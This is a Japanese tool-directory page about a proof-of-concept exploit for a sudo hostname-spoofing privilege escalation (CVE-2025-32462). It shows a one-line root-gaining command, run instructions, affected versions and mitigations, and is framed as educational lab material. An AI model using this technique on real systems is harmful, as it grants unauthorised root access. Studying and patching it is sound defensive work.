Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32462-Exploit — CVE-2025-32462 エクスプロイト | Kitploit
ツール/GitHubGitHub/cybersentinelx1/cve-2025-32462-exploit
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHubcybersentinelx1/cve-2025-32462-exploit

CVE-2025-32462-Exploit

CVE-2025-32462 エクスプロイト

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32462-Exploit: Matrix-Sudo Escape

ホスト名スプーフィングによる権限昇格 (CVE-2025-32462)

「青い薬を飲めば…話は終わる。赤い薬を飲めば…rootを手に入れる。」

説明

このエクスプロイトは、sudoの権限昇格脆弱性(CVE-2025-32462)を示しています。この脆弱性では、-hフラグを使用してホスト名ベースの制限をバイパスできます。PoCは、制限付きユーザー環境を作成し、許可されたホスト名を偽装してそれを脱出し、rootアクセスを取得します。

root@kitploit:~
[user@matrix-node]$ sudo -h zion-core bash  # 許可されたホスト名を偽装
[root@matrix-node]# id                          # 間違ったホスト名でrootを取得!
uid=0(root) gid=0(root) groups=0(root)

技術的詳細

  • 影響を受けるsudoのバージョン: < 1.9.17
  • 攻撃ベクトル: ローカル権限昇格
  • 主要な欠陥: sudo -hパラメータによるホスト名検証のバイパス
  • 影響: 不適切に設定されたシステム上で制限されたユーザーがrootを取得可能

使用方法

リポジトリのクローン:

root@kitploit:~
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape

実行可能にして実行:

root@kitploit:~
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh

対話型プロンプトに従ってデモンストレーション:

  • CVE-2025-32462脆弱性の検出
  • ユーザーの作成
  • ホスト名制限の設定
  • エクスプロイトの実行
  • クリーンアップ

防御策

  • ✅ sudoをv1.9.17以上にアップデート
  • ✅ ホスト名ベースのsudo制限を避ける
  • ✅ 代わりにグループベースのsudoポリシーを使用する

法的注意

教育/研究目的のみ。所有しているか、テスト許可を得たシステムでのみ使用してください。

ツールをダウンロード